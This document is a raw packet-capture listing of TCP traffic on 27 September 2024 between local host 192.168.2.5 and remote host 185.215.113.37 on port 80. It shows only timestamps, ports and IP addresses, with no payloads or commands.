Sep 27, 2024 04:14:14.459687948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459691048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459703922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459718943 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459738016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459826946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459836006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459846020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459860086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459870100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459876060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459882021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459888935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459903002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459928989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.459955931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.459974051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460000038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460011005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460123062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460133076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460143089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460155964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460165977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460166931 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460180998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460191965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460191965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460206032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460233927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460417032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460427999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460438013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460447073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460458040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460458994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460468054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460470915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460479021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460489035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460499048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460503101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460509062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460530043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460545063 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460714102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460722923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460738897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460750103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460760117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460761070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460769892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460784912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460803032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.460982084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.460993052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461002111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461013079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461023092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461033106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461033106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461044073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461055040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461061001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461065054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461072922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461082935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461083889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461095095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461103916 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461123943 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461148024 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461304903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461314917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461324930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461335897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461345911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461349010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461355925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461374998 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461390972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461587906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461599112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461610079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461622000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461632013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461632967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461642027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461651087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461652994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461664915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461677074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461682081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461693048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461704016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461704016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461714983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461716890 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461724997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461735010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461745977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461744070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461765051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461767912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461791039 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461812973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.461950064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461961031 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461971045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461980104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461990118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.461994886 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.462001085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.462011099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.462019920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.462021112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.462044954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.462066889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491107941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491221905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491250992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491283894 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491283894 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491300106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491342068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491342068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491358995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491398096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491435051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491481066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491502047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491533041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491539001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491565943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491568089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491599083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491601944 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491641998 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491647005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491677046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491695881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491708994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491714954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491745949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491755962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491792917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491805077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491843939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491852045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491883993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491905928 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491914988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491923094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491947889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491950989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.491980076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.491986036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492012024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492016077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492043018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492048979 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492074013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492084980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492105961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492111921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492136955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492144108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492168903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492168903 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492201090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492208004 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492233992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492234945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492264986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492270947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492295980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492301941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492331028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492343903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492374897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492382050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492407084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492410898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492435932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492444038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492471933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492485046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492516041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492537975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492547035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492552996 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492580891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492583036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492611885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492619038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492649078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.492656946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.492693901 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.551780939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.551814079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.551882029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.551945925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.551979065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552011967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552043915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552077055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552108049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552144051 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552144051 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552144051 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552144051 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552153111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552172899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552197933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552201986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552233934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552254915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552265882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552275896 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552308083 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552314997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552346945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552360058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552381039 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552392960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552412033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552423954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552448988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552459955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552479982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552491903 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552511930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552520037 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552544117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552561045 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552591085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552594900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552625895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552643061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552659035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552676916 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552686930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552711010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552717924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552747011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552759886 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552767992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552798986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552810907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552848101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552875042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552879095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552892923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552912951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552921057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552944899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552954912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.552978992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.552983046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553011894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553024054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553044081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553052902 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553076029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553086042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553107977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553122044 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553141117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553150892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553173065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553181887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553205013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553214073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553236961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553251982 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553280115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553286076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553328991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553335905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553366899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553378105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553399086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553411007 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553431034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553441048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553462982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553472042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553494930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553503990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553527117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553536892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553571939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553642988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553673983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553683043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553708076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553719997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553739071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553750038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553771019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553780079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553802013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553812981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553834915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553839922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553869963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.553877115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.553914070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554013014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554044962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554056883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554076910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554080963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554110050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554116011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554152012 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554152966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554184914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554195881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554219007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554224968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554250956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554255962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554282904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554291964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554316044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554325104 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554347992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554357052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554378986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554389000 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554410934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554419041 CEST	49704	80	192.168.2.5	185.215.113.37
